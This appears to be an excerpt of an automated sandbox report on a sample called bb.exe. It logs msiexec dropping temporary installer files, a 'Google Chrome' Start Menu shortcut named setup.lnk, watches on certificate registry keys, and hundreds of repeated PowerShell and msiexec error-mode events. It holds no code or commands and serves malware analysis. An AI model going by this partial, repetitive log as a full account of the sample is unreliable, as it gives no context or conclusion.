            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFEB8.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9F.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFC17.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFBD7.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFAEC.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google ChromeJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\setup.lnkJump to behavior
            Source: C:\Users\user\Desktop\bb.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
            Source: C:\Users\user\Desktop\bb.exeRegistry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CAJump to behavior
            Source: C:\Users\user\Desktop\bb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\bb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\bb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\bb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\bb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\bb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\bb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\bb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\bb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\bb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\bb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
